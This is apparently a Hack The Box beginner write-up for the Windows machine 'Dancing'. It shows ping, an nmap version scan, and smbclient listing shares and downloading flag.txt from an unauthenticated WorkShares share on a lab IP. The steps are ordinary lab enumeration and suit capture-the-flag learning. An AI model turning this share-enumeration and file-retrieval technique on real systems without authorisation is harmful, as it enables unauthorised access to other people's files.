---
sidebar_position: 3
sidebar_label: 💃 Dancing
description: This is the last Tier 0 Machine (free) , in this case It is a Windows Machine with an SMB service.
last_update:
  date: 2022/06/08
  author: Raúl Sánchez
tags:
  - smbclient
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Dancing

> This is the last Tier 0 Machine (free) , in this case It is a Windows Machine with an SMB service.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Dancing Machine](dancing1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.253.172`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.253.172
PING 10.129.253.172 (10.129.253.172) 56(84) bytes of data.
64 bytes from 10.129.253.172: icmp_seq=1 ttl=127 time=186 ms

--- 10.129.253.172 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 185.775/185.775/185.775/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.253.172

10.129.253.172 (ttl -> 127): Windows
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::info

Then, we will use the [nmap](https://nmap.org/) tool with the [-sV](https://nmap.org/book/man-version-detection.html) parameter to see the services and their version.

```python
❯ nmap -sV 10.129.253.172
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-08 18:51 CEST
Nmap scan report for 10.129.253.172
Host is up (0.086s latency).
Not shown: 871 closed tcp ports (conn-refused), 126 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

We observe that port 445 TCP for [SMB](https://en.wikipedia.org/wiki/Server\_Message\_Block) is up and running, which means that we have an active share that we could potentially explore.

:::note
**Server Message Block** (**SMB**) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network. It also provides an authenticated inter-process communication (IPC) mechanism.
:::

## 2. Foothold

In order to successfully enumerate share content on the remote system, we can use a script called `smbclient`.

```bash
sudo apt install smbclient
```

Then, we will use `smbclient` with the parameter `-L` to list the shares of the target.

```python
❯ smbclient -L 10.129.253.172
Password for [WORKGROUP\raul]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      
Unable to connect with SMB1 -- no workgroup available
```

Now, we will try to access to `Workshares` directory and list the files with `ls`.

```python
❯ smbclient \\\\10.129.253.172\\WorkShares
Password for [WORKGROUP\raul]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 10:22:01 2021
  ..                                  D        0  Mon Mar 29 10:22:01 2021
  Amy.J                               D        0  Mon Mar 29 11:08:24 2021
  James.P                             D        0  Thu Jun  3 10:38:03 2021

		5114111 blocks of size 4096. 1748429 blocks available
```

Finally, change the directory to **James.P** and get the flag.

```basic
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 10:38:03 2021
  ..                                  D        0  Thu Jun  3 10:38:03 2021
  flag.txt                            A       32  Mon Mar 29 11:26:57 2021

		5114111 blocks of size 4096. 1748429 blocks available
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0,1 KiloBytes/sec)
smb: \James.P\> quit
❯ cat flag.txt
```
